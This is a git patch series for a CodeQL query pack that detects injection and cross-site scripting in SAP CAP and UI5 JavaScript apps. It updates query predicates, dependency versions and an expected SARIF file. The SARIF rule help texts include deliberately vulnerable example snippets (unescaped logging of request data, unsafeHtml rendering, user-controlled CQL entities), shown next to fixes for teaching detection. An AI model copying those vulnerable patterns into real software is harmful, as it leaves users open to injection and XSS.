a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll index b80bb89c5..789322867 100644 --- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll +++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll @@ -329,7 +329,7 @@ class JsView extends UI5View { exists(DataFlow::ObjectLiteralNode control, string type, string path, string property | this = control.getFile() and type = result.getControlTypeName() and - ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote") and + ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote", _) and property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and result.getBinding().getBindingTarget().asDataFlowNode() = control.getAPropertyWrite(property) ) @@ -339,7 +339,7 @@ class JsView extends UI5View { exists(DataFlow::ObjectLiteralNode control, string type, string path, string property | this = control.getFile() and type = result.getControlTypeName() and - ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection") and + ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection", _) and property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and result.getBinding().getBindingTarget().asDataFlowNode() = control.getAPropertyWrite(property) ) @@ -382,7 +382,7 @@ class JsonView extends UI5View { exists(JsonObject control, string type, string path, string property | root = control.getParent+() and type = result.getControlTypeName() and - ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote") and + ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote", _) and property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and result.getBindingTarget() = control ) @@ -392,7 +392,7 @@ class JsonView extends UI5View { exists(JsonObject control, string type, string path, string property | root = control.getParent+() and type = result.getControlTypeName() and - ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection") and + ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection", _) and property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and result.getBindingTarget() = control ) @@ -533,7 +533,7 @@ class HtmlView extends UI5View, HTML::HtmlFile { exists(HTML::Element control, string type, string path, string property | this = control.getFile() and type = result.getControlTypeName() and - ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote") and + ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote", _) and property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and result.getBindingTarget() = control.getAttributeByName("data-" + property) ) @@ -543,7 +543,7 @@ class HtmlView extends UI5View, HTML::HtmlFile { exists(HTML::Element control, string type, string path, string property | this = control.getFile() and type = result.getControlTypeName() and - ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection") and + ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection", _) and property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and result.getBindingTarget() = control.getAttributeByName("data-" + property) ) @@ -659,7 +659,7 @@ class XmlView extends UI5View instanceof XmlFile { exists(XmlElement control, string type, string path, string property | this = control.getFile() and type = result.getControlTypeName() and - ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote") and + ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote", _) and property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and result.getBindingTarget() = control.getAttribute(property) ) @@ -669,7 +669,7 @@ class XmlView extends UI5View instanceof XmlFile { exists(XmlElement control, string type, string path, string property | this = control.getFile() and type = result.getControlTypeName() and - ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection") and + ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection", _) and property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and result.getBindingTarget() = control.getAttribute(property) and /* If the control is an `sap.ui.core.HTML` then the control should be missing the `sanitizeContent` attribute */ diff --git a/qlt.conf.json b/qlt.conf.json index 1db9ad4a8..e33a2227f 100644 --- a/qlt.conf.json +++ b/qlt.conf.json @@ -1,5 +1,5 @@ { - "CodeQLCLI": "2.15.1", - "CodeQLStandardLibrary": "codeql-cli/v2.15.1", - "CodeQLCLIBundle": "codeql-bundle-v2.15.1" + "CodeQLCLI": "2.17.3", + "CodeQLStandardLibrary": "codeql-cli/v2.17.3", + "CodeQLCLIBundle": "codeql-bundle-v2.17.3" } \ No newline at end of file From d8d870faeeac46aa4bbc004b1138dd5423b70568 Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 21:08:26 +0200 Subject: [PATCH 12/15] Update qlpack files --- javascript/frameworks/cap/ext/qlpack.yml | 6 ++--- .../frameworks/cap/lib/codeql-pack.lock.yml | 20 +++++++------- javascript/frameworks/cap/lib/qlpack.yml | 2 +- .../frameworks/cap/src/codeql-pack.lock.yml | 20 +++++++------- javascript/frameworks/cap/src/qlpack.yml | 4 +-- .../frameworks/cap/test/codeql-pack.lock.yml | 26 ++++++++++--------- javascript/frameworks/cap/test/qlpack.yml | 12 ++++----- javascript/frameworks/ui5/ext/qlpack.yml | 2 +- .../frameworks/ui5/lib/codeql-pack.lock.yml | 20 +++++++------- javascript/frameworks/ui5/lib/qlpack.yml | 2 +- .../frameworks/ui5/src/codeql-pack.lock.yml | 20 +++++++------- javascript/frameworks/ui5/src/qlpack.yml | 2 +- .../frameworks/ui5/test/codeql-pack.lock.yml | 26 ++++++++++--------- javascript/frameworks/ui5/test/qlpack.yml | 4 +-- javascript/heuristic-models/ext/qlpack.yml | 4 +-- .../tests/codeql-pack.lock.yml | 20 +++++++++----- javascript/heuristic-models/tests/qlpack.yml | 4 +-- scripts/codeql-pack.lock.yml | 20 +++++++------- scripts/qlpack.yml | 2 +- 19 files changed, 119 insertions(+), 97 deletions(-) diff --git a/javascript/frameworks/cap/ext/qlpack.yml b/javascript/frameworks/cap/ext/qlpack.yml index aa45e5fff..b0f8bc25e 100644 --- a/javascript/frameworks/cap/ext/qlpack.yml +++ b/javascript/frameworks/cap/ext/qlpack.yml @@ -3,7 +3,7 @@ library: true name: advanced-security/javascript-sap-cap-models version: 0.2.0 extensionTargets: - codeql/javascript-all: "^0.8.7" - codeql/javascript-queries: "^0.8.7" + codeql/javascript-all: "^0.9.1" + codeql/javascript-queries: "^0.8.16" dataExtensions: - - "*.model.yml" \ No newline at end of file + - "*.model.yml" diff --git a/javascript/frameworks/cap/lib/codeql-pack.lock.yml b/javascript/frameworks/cap/lib/codeql-pack.lock.yml index e17706661..9c7802785 100644 --- a/javascript/frameworks/cap/lib/codeql-pack.lock.yml +++ b/javascript/frameworks/cap/lib/codeql-pack.lock.yml @@ -2,21 +2,23 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/cap/lib/qlpack.yml b/javascript/frameworks/cap/lib/qlpack.yml index 27b474893..0938ebaed 100644 --- a/javascript/frameworks/cap/lib/qlpack.yml +++ b/javascript/frameworks/cap/lib/qlpack.yml @@ -5,5 +5,5 @@ version: 0.2.0 suites: codeql-suites extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" + codeql/javascript-all: "^0.9.1" advanced-security/javascript-sap-cap-models: "^0.2.0" diff --git a/javascript/frameworks/cap/src/codeql-pack.lock.yml b/javascript/frameworks/cap/src/codeql-pack.lock.yml index e17706661..9c7802785 100644 --- a/javascript/frameworks/cap/src/codeql-pack.lock.yml +++ b/javascript/frameworks/cap/src/codeql-pack.lock.yml @@ -2,21 +2,23 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/cap/src/qlpack.yml b/javascript/frameworks/cap/src/qlpack.yml index d9faa87d1..9dc2fdd1f 100644 --- a/javascript/frameworks/cap/src/qlpack.yml +++ b/javascript/frameworks/cap/src/qlpack.yml @@ -5,7 +5,7 @@ version: 0.2.0 suites: codeql-suites extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" + codeql/javascript-all: "^0.9.1" advanced-security/javascript-sap-cap-models: "^0.2.0" advanced-security/javascript-sap-cap-all: "^0.2.0" -default-suite-file: codeql-suites/javascript-code-scanning.qls \ No newline at end of file +default-suite-file: codeql-suites/javascript-code-scanning.qls diff --git a/javascript/frameworks/cap/test/codeql-pack.lock.yml b/javascript/frameworks/cap/test/codeql-pack.lock.yml index cddccdcf6..09a0ed7e9 100644 --- a/javascript/frameworks/cap/test/codeql-pack.lock.yml +++ b/javascript/frameworks/cap/test/codeql-pack.lock.yml @@ -2,27 +2,29 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/javascript-queries: - version: 0.8.7 + version: 0.8.16 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/suite-helpers: - version: 0.7.7 + version: 0.7.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/typos: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/cap/test/qlpack.yml b/javascript/frameworks/cap/test/qlpack.yml index aac199b10..8d504ba31 100644 --- a/javascript/frameworks/cap/test/qlpack.yml +++ b/javascript/frameworks/cap/test/qlpack.yml @@ -1,10 +1,10 @@ --- name: advanced-security/javascript-sap-cap-queries-tests -version: 0.1.0 +version: 0.2.0 extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" - codeql/javascript-queries: "^0.8.7" - advanced-security/javascript-sap-cap-queries: "^0.1.0" - advanced-security/javascript-sap-cap-models: "^0.1.0" - advanced-security/javascript-sap-cap-all: "^0.1.0" \ No newline at end of file + codeql/javascript-all: "^0.9.1" + codeql/javascript-queries: "^0.8.16" + advanced-security/javascript-sap-cap-queries: "^0.2.0" + advanced-security/javascript-sap-cap-models: "^0.2.0" + advanced-security/javascript-sap-cap-all: "^0.2.0" diff --git a/javascript/frameworks/ui5/ext/qlpack.yml b/javascript/frameworks/ui5/ext/qlpack.yml index 0640d17a9..2bb7c39a1 100644 --- a/javascript/frameworks/ui5/ext/qlpack.yml +++ b/javascript/frameworks/ui5/ext/qlpack.yml @@ -3,6 +3,6 @@ library: true name: advanced-security/javascript-sap-ui5-models version: 0.6.0 extensionTargets: - codeql/javascript-all: "^0.8.7" + codeql/javascript-all: "^0.9.1" dataExtensions: - "*.model.yml" diff --git a/javascript/frameworks/ui5/lib/codeql-pack.lock.yml b/javascript/frameworks/ui5/lib/codeql-pack.lock.yml index e17706661..9c7802785 100644 --- a/javascript/frameworks/ui5/lib/codeql-pack.lock.yml +++ b/javascript/frameworks/ui5/lib/codeql-pack.lock.yml @@ -2,21 +2,23 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/ui5/lib/qlpack.yml b/javascript/frameworks/ui5/lib/qlpack.yml index 7d9713250..df65416bf 100644 --- a/javascript/frameworks/ui5/lib/qlpack.yml +++ b/javascript/frameworks/ui5/lib/qlpack.yml @@ -5,5 +5,5 @@ version: 0.6.0 suites: codeql-suites extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" + codeql/javascript-all: "^0.9.1" advanced-security/javascript-sap-ui5-models: "^0.6.0" diff --git a/javascript/frameworks/ui5/src/codeql-pack.lock.yml b/javascript/frameworks/ui5/src/codeql-pack.lock.yml index e17706661..9c7802785 100644 --- a/javascript/frameworks/ui5/src/codeql-pack.lock.yml +++ b/javascript/frameworks/ui5/src/codeql-pack.lock.yml @@ -2,21 +2,23 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/ui5/src/qlpack.yml b/javascript/frameworks/ui5/src/qlpack.yml index afbb000c8..814a3dadb 100644 --- a/javascript/frameworks/ui5/src/qlpack.yml +++ b/javascript/frameworks/ui5/src/qlpack.yml @@ -5,7 +5,7 @@ version: 0.6.0 suites: codeql-suites extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" + codeql/javascript-all: "^0.9.1" advanced-security/javascript-sap-ui5-models: "^0.6.0" advanced-security/javascript-sap-ui5-all: "^0.6.0" default-suite-file: codeql-suites/javascript-code-scanning.qls diff --git a/javascript/frameworks/ui5/test/codeql-pack.lock.yml b/javascript/frameworks/ui5/test/codeql-pack.lock.yml index cddccdcf6..09a0ed7e9 100644 --- a/javascript/frameworks/ui5/test/codeql-pack.lock.yml +++ b/javascript/frameworks/ui5/test/codeql-pack.lock.yml @@ -2,27 +2,29 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/javascript-queries: - version: 0.8.7 + version: 0.8.16 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/suite-helpers: - version: 0.7.7 + version: 0.7.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/typos: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/ui5/test/qlpack.yml b/javascript/frameworks/ui5/test/qlpack.yml index 67876fb97..45b3cef98 100644 --- a/javascript/frameworks/ui5/test/qlpack.yml +++ b/javascript/frameworks/ui5/test/qlpack.yml @@ -2,8 +2,8 @@ name: advanced-security/javascript-sap-ui5-queries-tests version: 0.6.0 extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" - codeql/javascript-queries: "^0.8.7" + codeql/javascript-all: "^0.9.1" + codeql/javascript-queries: "^0.8.16" advanced-security/javascript-sap-ui5-queries: "^0.6.0" advanced-security/javascript-sap-ui5-models: "^0.6.0" advanced-security/javascript-sap-ui5-all: "^0.6.0" diff --git a/javascript/heuristic-models/ext/qlpack.yml b/javascript/heuristic-models/ext/qlpack.yml index 00cc2bc4e..3250c91d9 100644 --- a/javascript/heuristic-models/ext/qlpack.yml +++ b/javascript/heuristic-models/ext/qlpack.yml @@ -1,9 +1,9 @@ --- -library: true +library: true warnOnImplicitThis: false name: advanced-security/javascript-heuristic-models version: 0.0.1 extensionTargets: codeql/javascript-all: "*" dataExtensions: - - "*.model.yml" \ No newline at end of file + - "*.model.yml" diff --git a/javascript/heuristic-models/tests/codeql-pack.lock.yml b/javascript/heuristic-models/tests/codeql-pack.lock.yml index 0c51b170f..9c7802785 100644 --- a/javascript/heuristic-models/tests/codeql-pack.lock.yml +++ b/javascript/heuristic-models/tests/codeql-pack.lock.yml @@ -1,16 +1,24 @@ --- lockVersion: 1.0.0 dependencies: + codeql/dataflow: + version: 0.2.7 codeql/javascript-all: - version: 0.8.4 + version: 0.9.1 codeql/mad: - version: 0.2.4 + version: 0.2.16 codeql/regex: - version: 0.2.4 + version: 0.2.16 + codeql/ssa: + version: 0.2.16 codeql/tutorial: - version: 0.2.4 + version: 0.2.16 + codeql/typetracking: + version: 0.2.16 codeql/util: - version: 0.2.4 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.4 + version: 0.2.16 compiled: false diff --git a/javascript/heuristic-models/tests/qlpack.yml b/javascript/heuristic-models/tests/qlpack.yml index 4411fb5d0..0c28db69a 100644 --- a/javascript/heuristic-models/tests/qlpack.yml +++ b/javascript/heuristic-models/tests/qlpack.yml @@ -1,8 +1,8 @@ -library: false +library: false warnOnImplicitThis: false name: advanced-security/javascript-heuristic-models-tests version: 0.0.1 extractor: javascript dependencies: "codeql/javascript-all": "*" - "advanced-security/javascript-heuristic-models": "*" \ No newline at end of file + "advanced-security/javascript-heuristic-models": "*" diff --git a/scripts/codeql-pack.lock.yml b/scripts/codeql-pack.lock.yml index e17706661..9c7802785 100644 --- a/scripts/codeql-pack.lock.yml +++ b/scripts/codeql-pack.lock.yml @@ -2,21 +2,23 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/scripts/qlpack.yml b/scripts/qlpack.yml index 3e088617d..cc022c1a5 100644 --- a/scripts/qlpack.yml +++ b/scripts/qlpack.yml @@ -4,4 +4,4 @@ warnOnImplicitThis: false name: advanced-security/jsdoc-extraction version: 0.0.1 dependencies: - codeql/javascript-all: "^0.8.7" \ No newline at end of file + codeql/javascript-all: "^0.9.1" From f3fcd633580879510968ae8fa934b09214f8e54b Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 21:20:53 +0200 Subject: [PATCH 13/15] Update expected sarif --- .github/workflows/javascript.sarif.expected | 20144 ++---------------- 1 file changed, 1403 insertions(+), 18741 deletions(-) diff --git a/.github/workflows/javascript.sarif.expected b/.github/workflows/javascript.sarif.expected index f462b80fc..ae475cf03 100644 --- a/.github/workflows/javascript.sarif.expected +++ b/.github/workflows/javascript.sarif.expected @@ -6,7 +6,7 @@ "driver" : { "name" : "CodeQL", "organization" : "GitHub", - "semanticVersion" : "2.15.1", + "semanticVersion" : "2.17.3", "notifications" : [ { "id" : "cli/expected-extracted-files/javascript", "name" : "cli/expected-extracted-files/javascript", @@ -43,241 +43,8 @@ "rules" : [ ] }, "extensions" : [ { - "name" : "advanced-security/javascript-sap-cap-queries", - "semanticVersion" : "0.2.0+ebe0a6bdde3b48cd48fb332dd689a81c5906dbfe", - "rules" : [ { - "id" : "js/cap-sql-injection", - "name" : "js/cap-sql-injection", - "shortDescription" : { - "text" : "CQL query built from user-controlled sources" - }, - "fullDescription" : { - "text" : "Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building a CQL query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", - "id" : "js/cap-sql-injection", - "kind" : "path-problem", - "name" : "CQL query built from user-controlled sources", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/cap-log-injection", - "name" : "js/cap-log-injection", - "shortDescription" : { - "text" : "CAP Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/cap-log-injection", - "kind" : "path-problem", - "name" : "CAP Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "generated/extension-pack", - "semanticVersion" : "0.0.0", - "locations" : [ { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/codeql-pack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "advanced-security/javascript-sap-ui5-queries", - "semanticVersion" : "0.6.0+ebe0a6bdde3b48cd48fb332dd689a81c5906dbfe", - "rules" : [ { - "id" : "js/ui5-xss", - "name" : "js/ui5-xss", - "shortDescription" : { - "text" : "UI5 Client-side cross-site scripting" - }, - "fullDescription" : { - "text" : "Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` 